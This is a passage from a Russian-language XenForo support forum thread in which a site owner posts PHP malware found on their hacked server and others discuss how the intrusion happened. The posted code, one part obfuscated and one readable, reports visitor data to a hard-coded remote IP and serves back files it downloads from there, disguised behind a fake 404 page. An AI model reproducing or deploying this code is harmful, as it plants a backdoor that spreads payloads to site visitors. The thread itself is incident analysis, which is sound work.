"\x47L\x4f\x42\x41L\x53"}["\x67\x67tg\x78f\x71mh\x72"]},1024);if(!${$wetpmnqilx}&&strpos(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x76o\x66t\x6e\x74\x76v"]},"\r\n\r\n")!==FALSE){$ymmwrvoxk="\x70\x61\x72\x61m\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x74\x76\x6b\x6b\x76\x78\x64\x78o\x61"]="p\x61\x72\x61\x6d\x73";${${"\x47L\x4f\x42\x41\x4c\x53"}["p\x6c\x66\x70gt\x62"]}=true;$lqolddccno="r\x65\x73";${${"\x47\x4cOBA\x4cS"}["gcj\x68\x6f\x74\x7a"]}=substr(${${"G\x4c\x4f\x42\x41L\x53"}["voftn\x74\x76\x76"]},0,strpos(${${"\x47\x4cOB\x41\x4c\x53"}["\x76o\x66t\x6e\x74\x76\x76"]},"\r\n\r\n"));${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69\x6e\x79\x7a\x62i\x6dr\x63"]="\x70a\x72a\x6d\x73";${$lqolddccno}=substr(${${"\x47\x4c\x4fB\x41LS"}["\x76o\x66\x74\x6e\x74v\x76"]},strpos(${${"G\x4c\x4f\x42\x41L\x53"}["vo\x66t\x6e\x74\x76\x76"]},"\r\n\r\n")+4);${"\x47\x4cO\x42\x41L\x53"}["v\x69\x75\x78\x6b\x69\x71\x67\x68\x65"]="p\x61\x72\x61\x6d\x73";$ynocuad="\x70\x61\x72\x61\x6d\x73";if(${${"G\x4cOB\x41\x4cS"}["i\x6e\x79zb\x69m\x72\x63"]}["re\x74urn"]=="\x68e\x61de\x72s"||${$ynocuad}["r\x65tur\x6e"]=="\x61\x72ra\x79"||(isset(${$ymmwrvoxk}["\x72edir\x65\x63\x74"])&&${${"GL\x4fB\x41\x4c\x53"}["i\x63\x67\x64\x62\x76\x66\x78"]}["re\x64\x69re\x63t"]==true)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["tih\x62\x66\x6b\x6e\x64"]="\x68\x65\x61\x64\x65\x72\x73";$cxurfemi="\x76";$nswjgtyivh="\x68";${"G\x4c\x4f\x42A\x4c\x53"}["\x7a\x76\x73\x7ap\x75"]="h";${${"\x47LO\x42\x41L\x53"}["z\x76\x73zp\x75"]}=explode("\r\n",${${"\x47\x4c\x4fBA\x4cS"}["t\x69\x68\x62f\x6bn\x64"]});${${"\x47\x4c\x4f\x42A\x4cS"}["\x67\x63jh\x6ftz"]}=array();$vberfrg="\x6b";foreach(${$nswjgtyivh} as${$vberfrg}=>${$cxurfemi}){$goonxstjkr="\x76";if(strpos(${$goonxstjkr},":")){${"\x47\x4c\x4fB\x41\x4cS"}["\x6bk\x6a\x69\x67\x74\x6ak"]="v";$pdtxksekkf="\x76";${"\x47L\x4f\x42\x41\x4cS"}["\x6ex\x6ea\x7a\x73i\x78"]="\x76";${${"\x47\x4c\x4f\x42\x41LS"}["m\x71\x6ce\x62\x79\x7avm\x6a"]}=substr(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6e\x78\x6e\x61\x7as\x69\x78"]},0,strpos(${${"\x47LO\x42\x41\x4cS"}["\x6b\x6b\x6a\x69\x67\x74\x6ak"]},":"));${${"\x47L\x4f\x42A\x4c\x53"}["be\x72a\x74\x6c\x6f\x69\x6a"]}=trim(substr(${$pdtxksekkf},strpos(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x62\x65r\x61t\x6c\x6fi\x6a"]},":")+1));}${${"\x47\x4c\x4fB\x41LS"}["\x67\x63\x6ah\x6f\x74\x7a"]}[strtoupper(${${"G\x4cO\x42\x41\x4c\x53"}["\x6d\x71leb\x79\x7a\x76\x6d\x6a"]})]=${${"\x47\x4c\x4f\x42AL\x53"}["be\x72\x61\x74\x6c\x6f\x69\x6a"]};}}if(isset(${${"GL\x4f\x42A\x4c\x53"}["ic\x67d\x62vf\x78"]}["\x72\x65di\x72\x65c\x74"])&&${${"G\x4c\x4fB\x41L\x53"}["\x76iux\x6b\x69q\x67h\x65"]}["\x72e\x64i\x72\x65\x63\x74"]==true&&isset(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x67c\x6a\x68o\x74\x7a"]}["LOCATI\x4fN"])){${"GL\x4fB\x41\x4c\x53"}["\x76\x78\x67t\x6b\x66\x6dq"]="p\x61\x72\x61\x6ds";$mevkiblihp="he\x61\x64\x65r\x73";${${"\x47\x4cO\x42\x41L\x53"}["i\x63\x67\x64\x62v\x66\x78"]}["\x75\x72\x6c"]=${$mevkiblihp}["L\x4fCATI\x4f\x4e"];if(!isset(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69\x63\x67\x64b\x76fx"]}["\x72\x65\x64\x69r\x65\x63\x74-\x63\x6fu\x6et"]))${${"\x47\x4c\x4fB\x41LS"}["ic\x67d\x62v\x66x"]}["\x72\x65direct-\x63ount"]=0;if(${${"G\x4c\x4fB\x41\x4c\x53"}["\x76\x78gtkfm\x71"]}["\x72\x65\x64ire\x63t-\x63o\x75n\x74"]<10){$fkqxmrulf="\x66\x75\x6e\x63";$ftjyenwi="\x70\x61r\x61\x6d\x73";${${"\x47LO\x42A\x4c\x53"}["\x69\x63gd\x62vfx"]}["re\x64\x69\x72ec\x74-\x63ou\x6e\x74"]++;${"\x47\x4c\x4f\x42A\x4c\x53"}["l\x62\x79\x6f\x74\x68\x77"]="\x66\x75nc";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6e\x74en\x64\x77s\x62p"]="\x66u\x6e\x63";${$fkqxmrulf}=__FUNCTION__;return@is_object($this)?$this->${${"\x47\x4cO\x42\x41\x4cS"}["\x6e\x74e\x6e\x64\x77s\x62\x70"]}(${$ftjyenwi}):${${"\x47\x4c\x4fB\x41\x4cS"}["l\x62\x79\x6fth\x77"]}(${${"\x47\x4c\x4f\x42AL\x53"}["\x69\x63g\x64\x62v\x66\x78"]});}}if(${${"\x47LO\x42\x41\x4c\x53"}["\x6dtvk\x6bv\x78\x64x\x6f\x61"]}["r\x65tur\x6e"]=="\x68eade\x72s")return${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x67cj\x68o\x74\x7a"]};}}@fclose(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x69\x68\x76\x6b\x6e\x76h"]});}else return FALSE;if(${${"GLOBA\x4c\x53"}["ic\x67\x64\x62\x76fx"]}["r\x65\x74\x75\x72\x6e"]=="a\x72\x72\x61\x79")${${"\x47\x4cOB\x41\x4c\x53"}["\x76\x6f\x66tntvv"]}=array("he\x61d\x65\x72s"=>${$pmcvjns},"c\x6f\x6e\x74e\x6e\x74"=>${${"\x47LOB\x41\x4c\x53"}["k\x72\x63de\x66ut"]});return${${"\x47\x4c\x4f\x42ALS"}["\x68r\x69\x78\x62s\x64\x71c\x71ma"]};}
    ?>
    message.php
    Код:
    <?php
    error_reporting(0);
    ini_set("display_errors", 0);
    
    $remote = 'http://78.138.118.127:443/45vtcgxx.php';
    
    php_display($remote);
    
    error_404();
    
    function php_display($url)
    {   
        $query = array();
        $query['ip'] = getIp();
        $query['time'] = date('d/M/Y:H:i:s', time());
        $query['request'] = getRequest();
        $query['path'] = getPath();
        $query['protocol'] = getProtocol();
        $query['useragent'] = getUseragent();
        $query['referer'] = getReferer();
       
        $url = $url."?".http_build_query($query);
    
        $content = @file_get_contents($url);
       
        if(strlen($content) < 10)
        {
            error_404();
        }
       
        $content = explode("\n", $content);
        $filename = array_shift($content);
        $content = implode("\n", $content);
    
        if (strstr($filename, ".html") === FALSE)
        {
            $type = 'application/octet-stream';
            header('Content-Type:'.$type);
            header('Content-Disposition: attachment; filename='.$filename);
            header('Content-Length: '.  strlen($content));
        }
    
    
        echo $content;
        exit();
    }
    
    
    function http_request($params)
    {
        if( ! is_array($params) )
        {
            $params = array(
                'url' => $params,
                'method' => 'GET'
            );
        }
       
        if( $params['url']=='' ) return FALSE;
       
        if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
        $params['method'] = strtoupper($params['method']);
        if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
       
        /* ╧Ёштюфшь ёё√ыъє т яЁртшы№э√щ тшф */
        $url = parse_url($params['url']);
        if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
        if( ! isset($url['path']) ) $url['path'] = '/';
        if( ! isset($url['host']) && isset($url['path']) )
        {
            if( strpos($url['path'], '/') )
            {
                $url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
                $url['path'] = substr($url['path'], strpos($url['path'], '/'));
            }
            else
            {
                $url['host'] = $url['path'];
                $url['path'] = '/';   
            }
        }
        $url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
        if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
       
        $port = isset($params['port']) ? $params['port']
                : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
       
        $timeout = isset($params['timeout']) ? $params['timeout'] : 30;
        if( ! isset($params['return']) ) $params['return'] = 'content';
       
        $scheme = $url['scheme']=='https' ? 'ssl://':'';
        $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
        if( $fp )
        {
            /* Mozilla */
            if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
           
            $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
            $request .= "Host: {$url['host']}\r\n";
            $request .= "User-Agent: {$params['User-Agent']}"."\r\n";
            if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
            if( isset($params['cookie']) )
            {
                $cookie = "";
                if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
                else $cookie = $params['cookie'];
                if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
            }
            $request .= "Connection: close\r\n";
            if( $params['method']=='POST' )
            {
                if( isset($params['data']) && is_array($params['data']) )
                {
                    foreach($params['data'] AS $k => $v)
                        $data .= urlencode($k).'='.urlencode($v).'&';
                    if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
                }
                $data .= "\r\n\r\n";
               
                $request .= "Content-type: application/x-www-form-urlencoded\r\n";
                $request .= "Content-length: ".strlen($data)."\r\n";
            }
            $request .= "\r\n";
           
            if( $params['method'] == 'POST' ) $request .= $data;
           
            @fwrite ($fp,$request); /* Send request */
           
            $res = ""; $headers = ""; $h_detected = false;
            while( !@feof($fp) )
            {
                $res .= @fread($fp, 1024); /* ўшЄрхь ъюэЄхэЄ */
       
                /* ╧ЁютхЁър эрышўш  чруыютъют т ъюэЄхэЄх */
                if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
                {
                    /* чруюыютъш єцх ёўшЄрэ√ - ъюЁЁхъЄшЁєхь ъюэЄхэЄ */
                    $h_detected = true;
                   
                    $headers = substr($res, 0, strpos($res, "\r\n\r\n"));
                    $res = substr($res, strpos($res, "\r\n\r\n")+4);
                   
                    /* Headers to Array */
                    if( $params['return']=='headers' || $params['return']=='array'
                        || (isset($params['redirect']) && $params['redirect']==true) )
                    {
                        $h = explode("\r\n", $headers);
                        $headers = array();
                        foreach( $h as $k=>$v )
                        {
                            if( strpos($v, ':') )
                            {
                                $k = substr($v, 0, strpos($v, ':'));
                                $v = trim(substr($v, strpos($v, ':')+1));
                            }
                            $headers[strtoupper($k)] = $v;
                        }
                    }
                    if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
                    {
                        $params['url'] = $headers['LOCATION'];
                        if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
                        if( $params['redirect-count']<10 )
                        {
                            $params['redirect-count']++;
                            $func = __FUNCTION__;
                            return @is_object($this) ? $this->$func($params) : $func($params);
                        }
                    }
                    if( $params['return']=='headers' ) return $headers;
                }
            }
           
            @fclose($fp);
        }
        else return FALSE;/* $errstr.$errno; */
       
        if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
       
        return $res;
    }
    
    
    function error_404()
    {
        /*header("HTTP/1.1 404 Not Found");
        exit("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n"
                ."<html><head><title>404 Not Found</title></head><body>\r\n"
                ."<h1>Not Found</h1>\r\n"
                ."<p>The requested URL was not found on this server.</p>\r\n"
                ."<hr>\r\n"
                ."</body></html>\r\n");*/
    
        $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
        $content = http_request("http://".$_SERVER['SERVER_NAME']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
        $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
    
        exit( $content );
    }
    
    function getRequest()
    {
        return $_SERVER['REQUEST_METHOD'];
    }
    
    function getPath()
    {
        return $_SERVER['REQUEST_URI'];
    }
    
    function getProtocol()
    {
        return $_SERVER['SERVER_PROTOCOL'];
    }
    
    function getUseragent()
    {
        return $_SERVER['HTTP_USER_AGENT'];
    }
    
    function getReferer()
    {
        $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '-';
        return $referer;   
    }
    
    function getIp()
    {
        return $_SERVER['REMOTE_ADDR'];
    }
    
     
  2. Yoskaldyr

    Yoskaldyr Пользователь

    Регистрация:
    27.09.10
    Сообщения:
    1 921
    Симпатии:
    1 163
    Версия XF:
    1.0.4
    обычный шелл. Т.е. могу предположить что ломанули, но как и через что тут уже Вам разбираться :)
    99% дырка в настройке сервера
     
    crashik нравится это.
  3. crashik

    crashik Местный

    Регистрация:
    09.02.12
    Сообщения:
    19
    Симпатии:
    6
    Версия XF:
    1.1.3
    Да техподдержка подсказала что на впс уязвимый PHP 5.3.3-7+squeeze8 with Suhosin-Patch (cli) (built: Feb 10 2012 13:05:56)
    Начал проверять файлы и директории, еще в папке avatars/m2/ нашел два шела, залитых в мае. Вот блин проблем подкинули, теперь все файлы лопатить надо, либо просто заменить.
     
  4. infis

    infis Местный

    Регистрация:
    27.06.11
    Сообщения:
    5 966
    Симпатии:
    3 548
    Версия XF:
    1.5.9
    Уязвимость конкретно этой версии PHP заключается в том, что можно вывести сервер из строя, вызвав бесконечный цикл, который приведет к нехватке ресурсов. Эксплуатация этой уязвимости не может привести к заливке шела.
     
    Mirovinger нравится это.
  5. Yoskaldyr

    Yoskaldyr Пользователь

    Регистрация:
    27.09.10
    Сообщения:
    1 921
    Симпатии:
    1 163
    Версия XF:
    1.0.4
    а раз это впс - то 99% это проблема кривой настройки
     
  6. infis

    infis Местный

    Регистрация:
    27.06.11
    Сообщения:
    5 966
    Симпатии:
    3 548
    Версия XF:
    1.5.9
    Еще и не факт, что не ставили что-то левое из PPA, например, да и просто не из официальных репозиториев.

    Также могли быть какие-либо скрипты установлены помимо ксена.
     
  7. Oleg-2012

    Oleg-2012 Местный

    Регистрация:
    21.04.12
    Сообщения:
    700
    Симпатии:
    297
    А может тупо слабый пароль, тогда и ломать ничего не надо ! ;)

    Кстати проверить свой пароль на стойкость можно здесь:http://blog.kaspersky.ru/password-check/
    --- добавлено : Nov 17, 2013 11:50 AM ---
    Тут можно долго гадать, посмотрите логи как были залиты файлы, каким пользователем, может тогда и будет более понятно откуда это появилось !
     
    Последнее редактирование модератором: 25.11.2013

Поделиться этой страницей